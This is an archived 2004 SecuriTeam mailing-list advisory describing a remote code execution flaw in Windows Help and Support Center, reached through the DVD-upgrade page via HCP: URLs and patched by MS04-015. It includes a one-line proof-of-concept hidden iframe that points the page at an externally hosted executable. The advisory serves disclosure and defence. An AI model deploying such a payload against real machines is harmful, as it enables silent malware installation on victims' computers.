[NT] Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/12/04
- Previous message: SecuriTeam: "[EXPL] Monit Remote Shell Exploit (Long HTTP Request)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 12 May 2004 19:02:26 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
------------------------------------------------------------------------
SUMMARY
"Help and Support Center (HSC) is a feature in Windows that provides help
on a variety of topics" It can also be accessed via HCP: URLs. HSC is
installed by default on Windows XP and Windows Server 2003 systems.
An input invalidation vulnerability in HSC exposes users to a remote code
execution vulnerability. An attacker could use this vulnerability to run
arbitrary code whenever the victim opens a specially formatted HCP: URL.
The user may be automatically directed to such URL whenever he visits a
particular web page. The issue can be also be exploited via an e-mail.
DETAILS
Vulnerable Systems:
* Microsoft Windows XP and Microsoft Windows XP Service Pack 1
* Microsoft Windows XP 64-Bit Edition Service Pack 1
* Microsoft Windows XP 64-Bit Edition Version 2003
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 64-Bit Edition
The HSC installation contains various HTML and javascript files,which are
intended to be used by HSC's internal use. The HTML files belong in the My
Computer Zone because they require e.g. the ability to launch external
helper programs with JavaScript.
By using a specialy crafted url an attacker can cause the users local
machine to start and render helpctr.exe in the local context and passes
the injected url to the application. The user is then presented with the
Help and Support DvD Upgrade dialog in Help and Support Center.
With the Dvdupgrade page, The injected url is now linked to the "upgrade
now" button. By pressing the updrade now button, the user is presented
with a (open) / (save) dialog box with the offending ( attackers ) file.
This allows an attacker to initiate the Dvdupgrade action on HSC, inject
JavaScript code which will be run in the context of these HTML files,
speciffically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this way the
attacker can run scripts in the My Computer Zone, which can e.g. download
an start an attacker-supplied EXE program.
As an aside, no url activity is displayed and there is no address or
status bar for Help and Support.
Solution:
Microsoft was contacted on March 18th, 2004. A patch has been produced to
correct the vulnerability. They have issued the
following advisory:
<http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx>
http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx
Proof of Concept:
< iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe" width="1" height="1">
</iframe>
http://exploitlabs.com/msnspoof/poc/
http://exploitlabs.com/msnspoof/poc/index2.html
http://exploitlabs.com/msnspoof/poc/index3.jpg
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@exploitlabs.com>
Donnie Werner of exploitlabs.
The original article can be found at:
<http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt>
http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] Monit Remote Shell Exploit (Long HTTP Request)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
